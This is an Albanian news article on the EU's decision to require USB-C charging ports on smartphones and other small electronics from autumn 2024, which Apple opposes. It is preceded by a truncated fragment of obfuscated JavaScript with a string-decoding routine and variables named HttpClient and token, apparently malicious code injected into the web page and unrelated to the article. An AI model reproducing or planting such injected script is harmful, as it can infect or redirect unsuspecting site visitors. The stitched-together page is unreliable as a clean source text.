;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

BE detyron Apple të përdorë karikues të njëjtë me telefona tjerë

By

BE-ja ka vendosur që të gjithë telefonat inteligjentë të përdorin një port USB-C për karikim, një vendim që nuk është mirëpritur nga kompania Apple, iPhone i së cilës është i vetmi telefon i mençur përdor portin ‘Lightning’.

Marrëveshja e BE-së do të zbatohet nga vjeshta e vitit 2024, për të gjithë telefonat inteligjentë të shitur në bllok.

BE tha se ndryshimi i rregullit synon të reduktojë telashet për konsumatorët si dhe mbetjet elektronike, pasi do t’u mundësojë konsumatorëve të përdorin karikues më të vjetër për pajisjet e reja.

Rregullat do të zbatohen për të gjitha pajisjet elektronike të vogla dhe të mesme, të cilat do të përfshijnë telefonat celularë, tabletë, kamera, tastiera, altoparlantë dhe kufje.

Vendimi ende nuk është miratuar nga Parlamenti Evropian dhe Këshilli Evropian, por pritet të jetë një formalitet.

Artikuj të ngjashëm